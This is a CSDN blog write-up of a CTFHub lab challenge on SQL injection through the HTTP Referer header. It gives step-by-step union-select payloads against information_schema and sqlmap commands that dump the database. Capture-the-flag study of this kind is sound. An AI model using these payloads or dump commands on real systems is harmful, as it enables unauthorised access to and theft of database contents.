CTFHUB-技能树-Web题-SQL注入-Mysql结构-Refer注入

已于 2024-05-09 21:13:46 修改
阅读量888 收藏 7
点赞数 20
分类专栏: CTFHUB解题思路 文章标签: sql mysql 数据库
于 2024-04-09 21:52:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Static______/article/details/137568994
版权

技能树-Web题-SQL注入-Mysql结构-Refer注入

文章目录

Mysql结构—Refer注入
手工注入

根据提示,用bp抓包

HTTP_REFERER简介

HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

也就是说,只有当你向浏览器发送请求时,才会带上referer

如果一开始就抓包不发送请求是的得不到referer的,如下图:

在这里插入图片描述

所以向浏览器发送一个post请求:

在这里插入图片描述

发送完后在进行抓包就可以找referer:

在这里插入图片描述

找到后对referer进行传参

然后,正常进行sql注入。

判断注入点
1 and 1=1 有回显

在这里插入图片描述

1 and 1=2 无回显

在这里插入图片描述

说明此处存在注入点

判断字段数
1 order by 3 无回显

在这里插入图片描述

1 order by 2 有回显

在这里插入图片描述

说明字段数为2

判断回显字段数
-1 union select 1,2

在这里插入图片描述

1,2都显示,有两个回显字段

爆库名
-1 union select user(),database()

在这里插入图片描述

得到库名sqli

爆表名

-1 union select user(),group_concat(table_name) from information_schema.tables where table_schema = 'sqli'

在这里插入图片描述

得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表

爆列名
-1 union select user(),group_concat(column_name) from information_schema.columns where table_name = 'opneocsiil'

在这里插入图片描述

得到列名

爆数据
-1 union select user(),xpqkutgmfe from sqli.opneocsiil

在这里插入图片描述

sqlmap

refer注入 ,level 需要大于3

-p 指定参数,这里为 -p “id”

用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)

(windows python sqlmap.py )

爆库
sqlmap -r “xxxxx.txt” -p referer --level 5 --dbs

爆表
sqlmap -r “xxxxx.txt” -p referer --level 5 -D sqli --tables

直接导出表中数据
sqlmap -r “xxxxx.txt” -p referer --level 5 -D sqli -T asdnfa --columns --dump
python炒粉
关注
  • 20
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
flume-ng-sql-source-release-1.5.2.zip
06-26
flume-ng-sql-source-release-1.5.2.jar 用flume-ng-sql-source 从数据库抽取数据到kafka,支持sql
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 1801
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2027
数据库注入
CTFHUB-web-SQL注入
ookami6497的博客
11-29 695
CTFHUB SQL
CTFHub技能树 Web-SQL注入 详解
weixin_45808483的博客
11-16 3809
整数型注入 我们输入 1 不断尝试发现闭合方式就是 1 ,整数型 存在两列 order by 2 存在两个注入点 /?id=-1 union select 8,9 爆库,当前数据库sqli /?id=-1 union select 8,database() 爆出所有表名,这里我们需要吧sqli转换为16进制 /?id=-1 union select 8,group_concat(table_name) from infromation_schema...
web-components-kickstart:直接在Clojure中编写WebComponents,无需麻烦!
02-06
Web组件启动 Web组件很棒。 但是您可能会想到«天哪,这对我来说似乎太复杂了! 让我们休息一下吧! »。 而且您可能是正确的。 但是我们在Lisp那里,我们... ( :require [component :refer-macros [ defcomponent ]]
WCH-Link使用说明V1.2.pdf
04-15
沁恒仿真器使用说明
java-onvif.zip_-baijiahao_ONVIF java_java onvif_java-onvif_refer
07-15
利用java 实现与摄像机的onvif通讯
boot-cljs-test:启动任务以运行ClojureScript测试
05-10
开机cljs测试 ...(require '[crisptrutski.boot-cljs-test :refer [test-cljs]]) (deftask testing [] (merge-env! :source-paths #{"test"}) identity) 运行boot testing test-cljs ;; Testing you
继续SQL
qq_47966193的博客
05-09 541
● 例如:datediff('2021-06-08','2021-06-01')返回7,datediff('2021-06-08 23:59:59','2021-06-01 21:00:00')返回7,datediff('2021-06-01','2021-06-08')返回-7。● 例如:year('2021-08-03')返回2021,month('2021-08-03')返回8,day('2021-08-03')返回3。
【postgresql】PostgreSQL中的pgrowlocks插件介绍
hdhdhdk的博客
05-16 455
pgrowlocks是一个PostgreSQL的贡献者扩展,它扩展了标准的锁监控功能,允许用户查询特定表的行级锁信息。与pg_locks系统视图相比,pgrowlocks提供了更加细化的锁状态视图,能够显示哪些行被哪些事务锁定,这对于排查锁冲突、优化查询计划和调整并发控制策略至关重要。
this is incompatible with sql_mode=only_full_group_by
最新发布
weixin_60435181的博客
05-16 32
this is incompatible with sql_mode=only_full_group_by
pgbackrest 备份工具使用 postgresql
liyayou的博客
05-10 667
我们的备份策略基本是,1天1次完整备份,1个小时1次差异备份。注意:命令中postgres:postgres,是为了授权给postgres用户权限,而且最好是用postgres用户,不然会遇到很多操作报无权限【因为postgresql在安装初始化的时候就自动创建了一个系统用户postgres,默认使用的也是postgres】#加上 --delta ,pgBackRest 自动确定数据库集群目录中的哪些文件可以保留,哪些文件需要从备份中恢复 — 它还会删除备份清单中不存在的文件,以便处理不同的更改。
1、sql server数据库进行sql注入
weixin_51520483的博客
05-15 585
1、判断数据类型是很重要的一点,影响后面的注入语句2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形。
Oracle数据库之PL/SQL基本语法(八)
pursue_mony的博客
05-14 109
PL/SQL 是 Oracle 数据库中使用的过程化 SQL 语言扩展,它允许你在 SQL 语句中嵌入控制结构、变量声明、异常处理等。用于在 PL/SQL 块中输出调试信息。为了看到这些信息,你需要在 SQL*Plus 或其他客户端中启用它(例如,使用。PL/SQL 代码通常被组织在块(block)中。一个块包含三个部分:声明部分、执行部分和异常处理部分。包是 PL/SQL 中一种将逻辑、变量、常量、游标、类型、子程序、异常等组合在一起的数据库对象。在 PL/SQL 中,你可以在。部分来处理运行时错误。
SQLSQL常见面试总结(3)
weixin_45683778的博客
05-16 289
sql由浅入深,面试,【SQLSQL常见面试总结(3)
SQL的心得
weixin_64842400的博客
05-11 489
接着,系统按照 GROUP BY 子句中的指定字段分组,并对每个分组进行计算,生成虚拟的分组结果表。执行顺序 :from > on > where > group by > having > select > distinct > order by > top。4、聚合函数本质:对指定的列进行聚合,如果我们用了group by,我们可以对每个分组应用内聚合函数。在分组内部,聚合函数会自动处理所有重复的行。具体来说,在执行 SELECT 子句时,系统先计算 SELECT 中的列表达式和函数等,然后。
start-up error 03. refer easypbc user guide
01-12
start-up error 03是指在启动过程中出现的错误代码。根据错误提示,建议用户参考《easypbc用户指南》以了解更多相关信息。 在遇到start-up error 03时,用户可以首先查找《easypbc用户指南》中有关该错误代码的章节...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值